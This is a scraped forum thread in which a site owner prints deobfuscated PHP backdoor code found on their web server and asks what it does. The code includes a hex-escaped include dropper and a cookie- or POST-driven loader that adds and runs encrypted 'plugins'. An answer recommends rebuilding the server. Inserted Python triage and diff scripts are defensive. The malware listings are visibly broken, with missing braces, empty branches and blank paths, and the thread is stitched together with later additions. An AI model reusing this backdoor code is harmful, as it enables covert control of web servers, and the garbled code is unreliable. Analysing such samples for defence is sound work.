dongmaobeng7145 2017-04-04 15:42
Views: 126

My website is infected with obfuscated PHP malware - what is it doing + how do I get rid of it?

I have three websites all hosted on the same webserver. Recently I was working on one of the websites and noticed that, about a month ago, a bunch of files had been changed. Specifically, all instances of index.html had been renamed to index.html.bak.bak, and index.php files have been put in their places. The index.php files are relatively simple; they include a file hidden somewhere in each website's filesystem (seemingly a random folder) that's been obfuscated with JS hex encoding, then echo the original index.html:


@include "\x2fm\x6et\x2fs\x74o\x721\x2dw\x631\x2dd\x66w\x31/\x338\x304\x323\x2f4\x365\x380\x39/\x77w\x77.\x77e\x62s\x69t\x65.\x63o\x6d/\x77e\x62/\x63o\x6et\x65n\x74/\x77p\x2di\x6ec\x6cu\x64e\x73/\x6as\x2fs\x77f\x75p\x6co\x61d\x2ff\x61v\x69c\x6fn\x5f2\x391\x337\x32.\x69c\x6f";


echo file_get_contents('index.html.bak.bak');

The included file here was


On another domain, it was


As you could probably guess, these aren't actually favicons - they're just php files with a different extension. Now, I have no clue what these files do (which is why I'm asking here). They were totally obfuscated, but seems to be able to crack through it. The results can be found here, but I've pasted the de-obfuscated code below:

@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);

    define("PHP_EOL", "

    define("DIRECTORY_SEPARATOR", "/");

if (!defined('ALREADY_RUN_144c87cf623ba82aafi68riab16atio18'))
    define('ALREADY_RUN_144c87cf623ba82aafi68riab16atio18', 1);

    $data = NULL;
    $data_key = NULL;

    $GLOBALS['cs_auth'] = '8debdf89-dfb8-4968-8667-04713f279109';
    global $cs_auth;

    if (!function_exists('file_put_contents'))
        function file_put_contents($n, $d, $flag = False)
            $mode = $flag == 8 ? 'a' : 'w';
            $f = @fopen($n, $mode);
            if ($f === False)
                return 0;
                if (is_array($d)) $d = implode($d);
                $bytes_written = fwrite($f, $d);
                return $bytes_written;

    if (!function_exists('file_get_contents'))
        function file_get_contents($filename)
            $fhandle = fopen($filename, "r");
            $fcontents = fread($fhandle, filesize($filename));

            return $fcontents;
    function cs_get_current_filepath()
        return trim(preg_replace("/\(.*\$/", '', __FILE__));

    function cs_decrypt_phase($data, $key)
        $out_data = "";

        for ($i=0; $i<strlen($data);)
            for ($j=0; $j<strlen($key) && $i<strlen($data); $j++, $i++)
                $out_data .= chr(ord($data[$i]) ^ ord($key[$j]));

        return $out_data;

    function cs_decrypt($data, $key)
        global $cs_auth;

        return cs_decrypt_phase(cs_decrypt_phase($data, $key), $cs_auth);
    function cs_encrypt($data, $key)
        global $cs_auth;

        return cs_decrypt_phase(cs_decrypt_phase($data, $cs_auth), $key);

    function cs_get_plugin_config()
        $self_content = @file_get_contents(cs_get_current_filepath());

        $config_pos = strpos($self_content, md5(cs_get_current_filepath()));
        if ($config_pos !== FALSE)
            $config = substr($self_content, $config_pos + 32);
            $plugins = @unserialize(cs_decrypt(base64_decode($config), md5(cs_get_current_filepath())));
            $plugins = Array();

        return $plugins;

    function cs_set_plugin_config($plugins)
        $config_enc = base64_encode(cs_encrypt(@serialize($plugins), md5(cs_get_current_filepath())));
        $self_content = @file_get_contents(cs_get_current_filepath());

        $config_pos = strpos($self_content, md5(cs_get_current_filepath()));
        if ($config_pos !== FALSE)
            $config_old = substr($self_content, $config_pos + 32);
            $self_content = str_replace($config_old, $config_enc, $self_content);

            $self_content = $self_content . "

//" . md5(cs_get_current_filepath()) . $config_enc;

        @file_put_contents(cs_get_current_filepath(), $self_content);

    function cs_plugin_add($name, $base64_data)
        $plugins = cs_get_plugin_config();

        $plugins[$name] = base64_decode($base64_data);


    function cs_plugin_rem($name)
        $plugins = cs_get_plugin_config();



    function cs_plugin_load($name=NULL)
        foreach (cs_get_plugin_config() as $pname=>$pcontent)
            if ($name)
                if (strcmp($name, $pname) == 0)

    foreach ($_COOKIE as $key=>$value)
        $data = $value;
        $data_key = $key;

    if (!$data)
        foreach ($_POST as $key=>$value)
            $data = $value;
            $data_key = $key;

    $data = @unserialize(cs_decrypt(base64_decode($data), $data_key));

    if (isset($data['ak']) && $cs_auth==$data['ak'])
        if ($data['a'] == 'i')
            $i = Array(
                'pv' => @phpversion(),
                'sv' => '2.0-1',
                'ak' => $data['ak'],
            echo @serialize($i);
        elseif ($data['a'] == 'e')
        elseif ($data['a'] == 'plugin')
            if($data['sa'] == 'add')
                cs_plugin_add($data['p'], $data['d']);
            elseif($data['sa'] == 'rem')
        echo $data['ak'];



In addition, there is a file called init5.php in one of the website's content folders, which after deobfuscating as much as possible, becomes:

$GLOBALS['893\Gt3$3'] = $_POST;
$GLOBALS['S9]<\<\$'] = $_COOKIE;
@>P>r"$,('$66N6rTNj', NULL);
@>P>r"$,('TNjr$66N6"', 0);
@>P>r"$,('k3'r$'$9#,>NPr,>k$', 0);
$w6f96424 = NULL;
$s02c4f38 = NULL;
global $y10a790;
function a31f0($w6f96424, $afb8d)
    $p98c0e = "";

    for ($r035e7=0; $r035e7<",6T$P($w6f96424);)
        for ($l545=0; $l545<",6T$P($afb8d) && $r035e7<",6T$P($w6f96424); $l545++, $r035e7++)
            $p98c0e .= 9)6(N6`($w6f96424[$r035e7]) ^ N6`($afb8d[$l545]));

    return $p98c0e;

function la30956($w6f96424, $afb8d)
    global $y10a790;

    return 3\x9<(3\x9<($w6f96424, $y10a790), $afb8d);

foreach ($GLOBALS['S9]<\<\$'] as $afb8d=>$ua56c9d)
    $w6f96424 = $ua56c9d;
    $s02c4f38 = $afb8d;

if (!$w6f96424)
    foreach ($GLOBALS['893\Gt3$3'] as $afb8d=>$ua56c9d)
        $w6f96424 = $ua56c9d;
        $s02c4f38 = $afb8d;

$w6f96424 = @#P"$6>3T>a$(T3\<]tO(R3"$OIr`$9N`$($w6f96424), $s02c4f38));
if (isset($w6f96424['38']) && $y10a790==$w6f96424['38'])
    if ($w6f96424['3'] == '>')
        $r035e7 = Array(
            '@=' => @@)@=$6">NP(),
            '"=' => 'x%<Fx',
        echo @"$6>3T>a$($r035e7);
    elseif ($w6f96424['3'] == '$')


There are more obfuscated PHP files the more I look, which is kinda scary. There's tons of them. Even Wordpress' index.php files seem to have been infected; the obfuscated @includes have been added to them. In addition, on one of the websites, there's a file titled 'ssh' that seems to be some kind of binary file (maybe the 'ssh' program itself?)

Does anyone know what these are or do? How did they get on my server? How can I get rid of them and make sure they never come back?

Some other info: my webhost is Laughing Squid; I have no shell access. The server runs Linux, Apache 2.4, and PHP 5.6.29. Thank you!
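A defender-side triage check for the indicators the question describes, as an added example that is not part of the original post or of any tool the poster used. It walks a copy of the web root and flags the four things the question reports: index.html renamed to index.html.bak.bak, PHP code sitting behind an image extension such as .ico, @include paths written with hex escapes (decoded so you can see where they actually point), and files that feed cookie or POST data into unserialize(base64_decode(...)). The sample tree, its file contents and the path /var/www/site/dropped.ico are constructed for the demo; nothing here is a real indicator from the poster's host.

```python
import os
import re
import tempfile

# Indicators described in the question: hex-escaped include paths, PHP code hiding
# behind an image extension, index.html renamed to index.html.bak.bak, and a
# cookie/POST-driven unserialize() loop.
INCLUDE_RE = re.compile(
    r'@?(?:include|require)(?:_once)?\s*\(?\s*["\']((?:\\x[0-9a-fA-F]{2}|[^"\'])+)["\']'
)
NON_PHP_EXT = {'.ico', '.png', '.jpg', '.gif', '.txt', '.css'}
PHP_OPEN_TAG = b'<?php'


def decode_hex_escapes(s):
    """Turn PHP-style \\xNN escapes into the characters they encode."""
    return re.sub(r'\\x([0-9a-fA-F]{2})', lambda m: chr(int(m.group(1), 16)), s)


def scan_file(root, path):
    """Return (indicator, relative_path, detail) tuples for one file."""
    rel = os.path.relpath(path, root).replace(os.sep, '/')
    with open(path, 'rb') as f:
        head = f.read(200_000)        # droppers and payloads of this kind are small
    text = head.decode('latin-1')     # keeps every byte; never fails on encoding
    hits = []
    if rel.endswith('.bak.bak'):
        hits.append(('renamed_original', rel, None))
    if os.path.splitext(rel)[1].lower() in NON_PHP_EXT and head.lstrip().startswith(PHP_OPEN_TAG):
        hits.append(('php_in_nonphp_ext', rel, None))
    for m in INCLUDE_RE.finditer(text):
        if '\\x' in m.group(1):       # a literal backslash-x in the source text
            hits.append(('hex_escaped_include', rel, decode_hex_escapes(m.group(1))))
    if ('$_COOKIE' in text or '$_POST' in text) and 'unserialize(' in text and 'base64_decode(' in text:
        hits.append(('cookie_or_post_unserialize', rel, None))
    return hits


def scan_tree(root):
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            findings.extend(scan_file(root, os.path.join(dirpath, name)))
    return sorted(findings)


# Constructed sample tree (not the poster's files): a dropper index.php in the
# shape shown in the question, the renamed original, a PHP payload behind an
# .ico extension, and two clean files that must not be flagged.
SAMPLE_SITE = {
    'index.html.bak.bak': b'<html><body>original page</body></html>\n',
    'index.php': (
        b'<?php\n'
        b'@include "\\x2fv\\x61r\\x2fw\\x77w\\x2fs\\x69te/\\x64r\\x6fp\\x70e\\x64.\\x69c\\x6f";\n'
        b"echo file_get_contents('index.html.bak.bak');\n"
    ),
    'wp-includes/js/swfupload/dropped.ico': (
        b'<?php /* constructed stand-in: the real payload reads $_COOKIE or $_POST\n'
        b'   and runs unserialize(base64_decode(...)) on it */ echo 1;\n'
    ),
    'wp-content/style.css': b'body { margin: 0 }\n',
    'favicon.ico': b'\x00\x00\x01\x00 real icon header\n',
}


def demo():
    """Write the constructed sample site to a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as root:
        for rel, content in SAMPLE_SITE.items():
            path = os.path.join(root, *rel.split('/'))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, 'wb') as f:
                f.write(content)
        return scan_tree(root)


if __name__ == '__main__':
    for indicator, rel, detail in demo():
        print(f'{indicator:28} {rel}' + (f'  -> {detail}' if detail else ''))
```

The decoded include path is the useful output: it tells you where the hidden payload lives without having to read the escapes by hand. Treat the scan as triage only; it finds the pattern the question shows, not everything an attacker with write access to the host may have left behind.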


6 answers

  • doujiao7483 2018-10-15 18:10

    You can't trust anything on the server at this point.

    • Reinstall the OS

    • Reinstall known good copies of your code with a clean or known-good version of the database.

    At this point there's no use in just replacing/deleting "bad" files because the attacker could have done absolutely anything ranging from "nothing" to replacing system level software with hacked versions that will do anything desired. Just for an example, at one point someone wrote malware into a compiler so even if the executable was rebuilt, the malware was still there, also it prevented the debugger from detecting it.

    There are various cleaners available, but they rely on knowing/detecting/undoing everything the attacker might have done, which is impossible.

    If you had good daily backups, you could do a diff between the "what you have" and "what you had before" and see what has changed, however you would still need to carefully examine or restore your database since many attacks involve changing data, not code.

    This answer was selected as the best answer by the asker.
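The answer's suggestion of diffing "what you have" against "what you had before", as an added example that is not part of the answer or of the poster's setup: it hashes every file under a known-good copy and under the live tree, then reports what was added, removed, renamed (same content under a new path) or modified. Both trees, their contents and the PLACEHOLDER names are constructed inline; the file layout mirrors the pattern from the question so the output shows what such a diff looks like.

```python
import hashlib
import os
import tempfile


def build_manifest(root):
    """Map each relative path under root to the SHA-256 of its content."""
    manifest = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, '/')
            digest = hashlib.sha256()
            with open(path, 'rb') as f:
                for chunk in iter(lambda: f.read(65536), b''):
                    digest.update(chunk)
            manifest[rel] = digest.hexdigest()
    return manifest


def diff_manifests(known_good, current):
    """Compare two manifests; every path in the result needs a human look."""
    added = set(current) - set(known_good)
    removed = set(known_good) - set(current)
    # A removed path whose content reappears under a new name is a rename,
    # e.g. index.html turning into index.html.bak.bak.
    by_hash = {known_good[p]: p for p in removed}
    renamed = sorted((by_hash[current[p]], p) for p in added if current[p] in by_hash)
    old_names = {old for old, _ in renamed}
    new_names = {new for _, new in renamed}
    return {
        'added': sorted(added - new_names),
        'removed': sorted(removed - old_names),
        'renamed': renamed,
        'modified': sorted(p for p in known_good
                           if p in current and known_good[p] != current[p]),
    }


# Constructed trees (not the poster's files): the backup from before the
# incident and the live site as it looks now.
KNOWN_GOOD = {
    'index.html': b'<html><body>original page</body></html>\n',
    'wp-includes/js/swfupload/swfupload.js': b'var SWFUpload = {};\n',
    'wp-content/style.css': b'body { margin: 0 }\n',
}
CURRENT = {
    'index.html.bak.bak': b'<html><body>original page</body></html>\n',
    'index.php': b'<?php @include "PLACEHOLDER"; echo file_get_contents("index.html.bak.bak");\n',
    'wp-includes/js/swfupload/swfupload.js': b'var SWFUpload = {};\n/* appended line */\n',
    'wp-includes/js/swfupload/favicon_PLACEHOLDER.ico': b'<?php /* payload stand-in */\n',
    'wp-content/style.css': b'body { margin: 0 }\n',
}


def write_tree(root, files):
    for rel, content in files.items():
        path = os.path.join(root, *rel.split('/'))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, 'wb') as f:
            f.write(content)


def demo():
    """Materialise both constructed trees and diff them."""
    with tempfile.TemporaryDirectory() as good, tempfile.TemporaryDirectory() as live:
        write_tree(good, KNOWN_GOOD)
        write_tree(live, CURRENT)
        return diff_manifests(build_manifest(good), build_manifest(live))


if __name__ == '__main__':
    for kind, paths in demo().items():
        print(kind, paths)
```

The manifest of the known-good copy is worth keeping as a file (a JSON dump of build_manifest's result) so the same comparison can be rerun after the rebuild. As the answer notes, this covers files only; the database has to be checked or restored separately.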


